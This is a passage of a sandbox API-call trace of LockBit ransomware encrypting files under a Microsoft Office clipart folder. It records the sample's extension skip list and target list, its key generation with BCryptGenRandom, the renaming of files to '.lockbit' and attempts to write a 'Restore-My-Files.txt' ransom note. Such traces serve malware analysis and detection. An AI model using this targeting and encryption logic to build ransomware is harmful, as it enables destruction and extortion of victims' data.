office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.343] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x967a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02886_.WMF", cAlternateFileName="")) returned 1 [0177.343] lstrcmpiW (lpString1=".", lpString2="SO02886_.WMF") returned -1 [0177.343] lstrcmpiW (lpString1="..", lpString2="SO02886_.WMF") returned -1 [0177.343] PathFindExtensionW (pszPath="SO02886_.WMF") returned=".WMF" [0177.343] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.343] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.344] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.344] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02886_.WMF") returned -1 [0177.345] lstrcmpiW (lpString1="ntldr", lpString2="SO02886_.WMF") returned -1 [0177.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02886_.WMF") returned -1 [0177.345] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02886_.WMF") returned -1 [0177.345] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02886_.WMF") returned -1 [0177.345] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02886_.WMF") returned 1 [0177.345] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02886_.WMF") returned -1 [0177.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF") returned=".WMF" [0177.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.346] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.346] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.347] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.347] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.347] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.347] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.347] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.348] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.348] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF.lockbit") returned 72 [0177.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02886_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.408] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.408] malloc (_Size=0x40068) returned 0x3df0008 [0177.408] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=38522) returned 1 [0177.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.409] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.411] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.411] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.412] free (_Block=0x1fa2ed8) [0177.413] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.413] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.413] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x22f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02958_.WMF", cAlternateFileName="")) returned 1 [0177.413] lstrcmpiW (lpString1=".", lpString2="SO02958_.WMF") returned -1 [0177.413] lstrcmpiW (lpString1="..", lpString2="SO02958_.WMF") returned -1 [0177.413] PathFindExtensionW (pszPath="SO02958_.WMF") returned=".WMF" [0177.413] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.413] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.414] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.414] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02958_.WMF") returned -1 [0177.415] lstrcmpiW (lpString1="ntldr", lpString2="SO02958_.WMF") returned -1 [0177.415] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02958_.WMF") returned -1 [0177.415] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02958_.WMF") returned -1 [0177.415] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02958_.WMF") returned -1 [0177.415] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02958_.WMF") returned 1 [0177.415] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02958_.WMF") returned -1 [0177.415] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.415] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF") returned=".WMF" [0177.415] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.415] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.415] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.416] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.416] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF.lockbit") returned 72 [0177.416] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02958_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.418] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.418] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.418] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8948) returned 1 [0177.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.419] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.423] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.423] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.425] free (_Block=0x1fa2ed8) [0177.425] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02958_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.425] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.425] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5aad71f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x107b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPACE_01.MID", cAlternateFileName="")) returned 1 [0177.425] lstrcmpiW (lpString1=".", lpString2="SPACE_01.MID") returned -1 [0177.425] lstrcmpiW (lpString1="..", lpString2="SPACE_01.MID") returned -1 [0177.425] PathFindExtensionW (pszPath="SPACE_01.MID") returned=".MID" [0177.425] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0177.425] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0177.425] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0177.425] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0177.425] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0177.426] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0177.426] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SPACE_01.MID") returned -1 [0177.427] lstrcmpiW (lpString1="ntldr", lpString2="SPACE_01.MID") returned -1 [0177.427] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SPACE_01.MID") returned -1 [0177.427] lstrcmpiW (lpString1="bootsect.bak", lpString2="SPACE_01.MID") returned -1 [0177.427] lstrcmpiW (lpString1="autorun.inf", lpString2="SPACE_01.MID") returned -1 [0177.427] lstrcmpiW (lpString1="thumbs.db", lpString2="SPACE_01.MID") returned 1 [0177.427] lstrcmpiW (lpString1="iconcache.db", lpString2="SPACE_01.MID") returned -1 [0177.427] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.427] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned=".MID" [0177.427] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0177.427] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0177.427] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0177.428] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0177.428] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0177.428] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0177.428] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0177.428] lstrcmpiW (lpString1=".mrg", 